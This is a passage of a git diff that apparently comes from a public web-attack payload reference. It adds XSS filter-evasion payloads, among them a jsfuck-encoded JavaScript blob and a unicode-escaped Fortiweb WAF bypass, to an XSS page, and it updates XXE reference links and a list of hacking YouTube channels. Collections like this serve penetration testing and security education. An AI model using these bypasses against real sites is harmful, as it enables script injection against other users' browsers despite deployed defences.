jsfuck](#bypass-using-jsfuck) - [CSP Bypass](#csp-bypass) - [Common WAF Bypass](#common-waf-bypass) @@ -143,6 +145,7 @@ Svg payload "> ">(`Firefox` is the only browser which allows self closing script) Div payload
MOVE HERE
@@ -775,6 +778,12 @@ You don't need to close your tags. .͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕ +``` + ### Bypass ";" using another character ```javascript @@ -926,9 +935,17 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o ``` +### Bypass using jsfuck + +Bypass using [jsfuck](http://www.jsfuck.com/) + +```javascript +[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() +``` + ## CSP Bypass -Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://appio.dev/vulns/google-csp-evaluator/) +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/) ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) @@ -975,7 +992,27 @@ Works for CSP like `script-src 'self' data:` ## Common WAF Bypass -### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019 +### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec) + +#### 21st april 2020 + +```html + +``` + +#### 22nd august 2019 + +```html + +``` + +#### 3rd june 2019 ```html @@ -1041,6 +1078,11 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld ``` +### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019 + +```javascript +\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e +``` ## References @@ -1108,3 +1150,5 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) +- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) +- [Bypass < with <](https://hackerone.com/reports/639684) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b12c8c7..2c3623c 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -511,22 +511,22 @@ updating: xl/sharedStrings.xml (deflated 17%) ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) -* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) -* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) -* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +* [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka +* [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) +* [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) * [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) -* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html) * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) -* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify -* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht -* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) -* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) -* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) -* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) +* [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) April 11, 2014 by detectify +* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) August 05, 2016 by Raghav Bisht +* [OOB XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) by Sean Melia @seanmeals +* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 01/2017 +* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) JUNE 22, 2016 by YEO QUAN YANG * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) -* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +* [Exploiting XXE with local DTD files](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - 12/12/2018 - Arseniy Sharoglazov * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) -- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) -- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau +* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) +* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon +* [SynAcktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Juien SZLAMOWICZ, Sebastien DUDEK diff --git a/YOUTUBE.md b/YOUTUBE.md index ba90f41..c1ed1b9 100644 --- a/YOUTUBE.md +++ b/YOUTUBE.md @@ -9,6 +9,7 @@ - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) +- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) ## Conferences